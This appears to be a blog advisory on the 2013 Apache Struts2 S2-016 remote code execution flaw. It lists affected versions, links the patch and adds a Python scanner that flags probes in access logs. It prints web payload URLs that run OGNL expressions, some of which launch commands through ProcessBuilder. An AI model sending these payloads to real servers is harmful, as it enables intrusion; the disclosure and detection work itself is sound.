July 17, noon. I had just woken up when I saw a few familiar words: Struts2, remote code execution. Damn! Another new one right after the last one? I wasn't even awake yet. After looking into it, my whole feed had already been flooded with it ~~~ a storm is about to hit...
Reportedly the affected versions are 2.0.0 through 2.3.15, CVE number CVE-2013-2251. The cause is that the redirect: and redirectAction: prefix parameters are not properly filtered, which allows an attacker to remotely execute OGNL expressions when accessing a Struts2 application.
Proof of vulnerability:
http://host/struts2-blank/example/X.action?action:%25{3*4}
http://host/struts2-blank/example/X.action?redirect:%25{3*4}
http://host/struts2-blank/example/X.action?redirectAction:%25{3*4}
Code execution test:
http://host/struts2-blank/example/X.action?action:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','where'})).start()}
http://host/struts2-showcase/employee/save.action?redirect:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','where'})).start()}
http://host/struts2-showcase/employee/save.action?redirectAction:%25{(new+java.lang.ProcessBuilder(new+java.lang.String[]{'command','goes','where'})).start()}
The official site has already released the patch; administrators should hurry up and apply it, or else get ready to have your database dumped.
URL: http://struts.apache.org/download.cgi#struts23151
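While the patch is rolled out, the practical question for a defender is whether anyone has already been probing for the three prefix parameters listed above. The following is an added example, not part of the original post or of the Struts project: a small Python scanner that walks access-log lines in combined format (an assumption about the log layout), pulls out the request target, and flags any query parameter whose name starts with action:, redirect: or redirectAction: and carries an OGNL marker. It decodes twice so that both the %25{ form used in the proof above and a doubly encoded %2525{ variant are caught; a plain redirect:/index.jsp is not reported. The sample log lines are constructed for the example.

```python
import re
from urllib.parse import unquote

# Prefix parameters affected by S2-016 (CVE-2013-2251), per the advisory above.
AFFECTED_PREFIXES = ("action", "redirect", "redirectAction")

# Extract the request target from an Apache/nginx combined-format log line
# (assumed log layout).
REQUEST_RE = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/\d')

# A parameter *name* that starts with an affected prefix and a colon; the part
# after the colon is what Struts would treat as the action/redirect target.
PREFIX_RE = re.compile(r"^(action|redirect|redirectAction):(.*)$")


def decode_twice(s: str) -> str:
    """Undo single and double URL encoding: %2525{ -> %25{ -> %{ ; %25{ -> %{ -> %{."""
    return unquote(unquote(s))


def find_s2_016_probes(url: str) -> list[tuple[str, str]]:
    """Return (prefix, payload) pairs for query parameters that use an affected
    prefix and whose decoded name contains an OGNL expression marker."""
    if "?" not in url:
        return []
    hits = []
    for part in url.split("?", 1)[1].split("&"):
        # The prefix travels in the parameter *name*; split on the raw '=' first,
        # then decode, so an encoded %3D inside the payload does not cut it short.
        name = decode_twice(part.partition("=")[0])
        m = PREFIX_RE.match(name)
        if m and ("%{" in m.group(2) or "${" in m.group(2)):
            hits.append((m.group(1), m.group(2)))
    return hits


def scan_log(lines: list[str]) -> list[tuple[int, str, str]]:
    """Scan log lines; return (line_number, prefix, payload) for each probe."""
    findings = []
    for n, line in enumerate(lines, 1):
        m = REQUEST_RE.search(line)
        if not m:
            continue
        for prefix, payload in find_s2_016_probes(m.group(1)):
            findings.append((n, prefix, payload))
    return findings


# Constructed sample log lines (not real traffic): three probes using the
# harmless 3*4 expression, one normal request, one ordinary redirect: value.
SAMPLE_LOG = [
    '10.0.0.5 - - [17/Jul/2013:12:01:03 +0800] "GET /struts2-blank/example/X.action?action:%25{3*4} HTTP/1.1" 302 0',
    '10.0.0.5 - - [17/Jul/2013:12:01:04 +0800] "GET /struts2-showcase/employee/save.action?redirect:%25%7B3*4%7D HTTP/1.1" 302 0',
    '10.0.0.9 - - [17/Jul/2013:12:02:00 +0800] "GET /struts2-blank/example/X.action?redirectAction:%2525%7B3*4%7D HTTP/1.1" 302 0',
    '10.0.0.7 - - [17/Jul/2013:12:03:10 +0800] "GET /struts2-showcase/employee/list.action?page=2 HTTP/1.1" 200 5120',
    '10.0.0.7 - - [17/Jul/2013:12:03:11 +0800] "GET /struts2-blank/example/X.action?redirect:/index.jsp HTTP/1.1" 302 0',
]

if __name__ == "__main__":
    for n, prefix, payload in scan_log(SAMPLE_LOG):
        print(f"line {n}: prefix '{prefix}:' with OGNL payload {payload!r}")
```

Run it over a real access log by replacing SAMPLE_LOG with the file's lines; any hit means the host was at least scanned, and a hit with ProcessBuilder or similar in the payload should be treated as a compromise indicator rather than a probe. A WAF rule built on the same regex blocks the probes, but it is a stopgap: the fix is the 2.3.15.1 release linked above.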
Below is a screenshot of the exploit tool written in Python: [Figure]
I nearly got a scare when I searched for it on GOOGLE. I strongly recommend that you fix this tonight, even if it means working overtime!!!
Apache Struts remote command execution vulnerability with multiple prefix parameters (CVE-2013-2251)
Apache Struts multiple open redirection vulnerabilities (CVE-2013-2248)
Struts2 Remote Code Execution Vulnerability (S2-016)